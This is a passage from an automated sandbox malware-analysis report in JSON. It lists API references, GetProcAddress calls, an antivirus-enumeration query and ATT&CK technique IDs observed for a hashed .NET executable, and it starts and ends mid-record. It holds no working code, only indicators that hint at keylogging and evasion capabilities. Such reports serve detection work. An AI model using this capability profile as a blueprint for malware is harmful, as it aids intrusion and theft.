to API (Indicator: \"NtResumeProcess\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"NtSetInformationProcess\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"ShowCursor\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"EnableWindow\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"GetWindowThreadProcessId\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"GetClassName\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"GetClassNameA\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"SendMessageA\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"EnumChildWindows\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"GetWindowTextA\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"FindWindow\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"GetWindow\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"IsWindowVisible\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"ShowWindow\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"GetAsyncKeyState\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetProcessById\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"CompareString\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetObject\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetLogicalDrives\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetTempPath\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetFileInfo\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetEnvironmentVariable\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"MessageBox\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetTempFileName\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetEnvironmentVariable\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetForegroundWindow\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetVolumeInformation\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetWindowText\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetWindowTextLength\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"FindWindowEx\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"FindWindowExA\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"FindWindowA\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"SystemParametersInfoA\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"SendMessage\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetWindowPos\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"SystemParametersInfo\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"NtSuspendProcess\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"NtResumeProcess\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"Beep\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"NtSetInformationProcess\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"ShowCursor\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"EnableWindow\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetWindowThreadProcessId\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetClassName\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetClassNameA\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"SendMessageA\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"EnumChildWindows\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetWindowTextA\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"FindWindow\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetWindow\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"IsWindowVisible\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"ShowWindow\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetAsyncKeyState\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API (Indicator: \"SeDebugPrivilege\"; Source: \"00000000-00005756.00000001.67784.00050000.00000004.mdmp, 00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.00050000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found reference to API (Indicator: \"DefWindowProcW\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found reference to API (Indicator: \"DefWindowProcA\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-605", "type": 2, "relevance": 1, "name": "May execute SQL queries", "description": "\"Select * From AntiVirusProduct\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, Indicator: \"select * from antivirusproduct\")", "origin": "File/Memory", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-3", "type": 10, "name": "Loads the .NET runtime environment", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\9f895c66454577eff9c77442d0c84f71\\mscorlib.ni.dll\" at 64970000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-208", "type": 2, "relevance": 1, "name": "Contains ability to show a graphical window (API string)", "description": "Found reference to API \"GetWindowThreadProcessId\" (Indicator: \"GetWindowThreadProcessId\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"ShowWindow\" (Indicator: \"ShowWindow\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"GetWindowThreadProcessId\" (Indicator: \"GetWindowThreadProcessId\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"ShowWindow\" (Indicator: \"ShowWindow\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-16", "type": 2, "relevance": 2, "name": "Contains SQL queries", "description": "\"Select * From AntiVirusProduct\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, Indicator: \"select * from antivirusproduct\")", "origin": "File/Memory", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter VerQueryValueW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionAndSpinCount (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter IsProcessorFeaturePresent (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter _set_error_mode (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter ?set_terminate@@YAP6AXXZP6AXXZ@Z (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter _get_terminate (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter FindActCtxSectionStringW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetSystemWindowsDirectoryW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap_RetAddr (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter SetLoadedByMscoree (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetProcessWindowStation (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetUserObjectInformationW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter _CorExeMain (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetCLRFunction (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetTraceLoggerHandle (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetTraceEnableLevel (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetTraceEnableFlags (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter TraceEvent (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter IEE (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter IEE_RetAddr (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetStartupFlags (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetStartupFlags_RetAddr (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetHostConfigurationFile (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetHostConfigurationFile_RetAddr (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetCORVersion_RetAddr (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetCORVersion (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetCORSystemDirectory (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetCORSystemDirectory_RetAddr (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream_RetAddr (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter RtlUnwind (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter IsWow64Process (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter InitializeAcl (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter AddAccessAllowedAce (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter SetThreadStackGuarantee (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter AddVectoredContinueHandler (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter RemoveVectoredContinueHandler (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetWriteWatch (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter ResetWriteWatch (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CreateMemoryResourceNotification (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter QueryMemoryResourceNotification (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter QueryActCtxW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetFullPathName (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetFullPathNameW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CoGetContextToken (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetVersionEx (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetVersionExW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CryptReleaseContext (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CryptCreateHash (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CryptDestroyHash (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CryptHashData (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CryptGetHashParam (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CryptImportKey (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CryptExportKey (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CryptGenKey (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CryptGetKeyParam (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CryptDestroyKey (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CryptVerifySignatureA (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CryptSignHashA (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CryptGetProvParam (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CryptGetUserKey (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CryptEnumProvidersA (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetMetaDataInternalInterface (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetMetaDataInternalInterface_RetAddr (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter getJit (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetForegroundWindow (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetWindowTextA (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetUserDefaultUILanguage (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter SwitchToThread (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetCurrentThread (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter DuplicateHandle (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter OleGetClipboard (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CoGetObjectContext (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetTempPath (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter GetTempPathW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CreateFile (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005756)\n 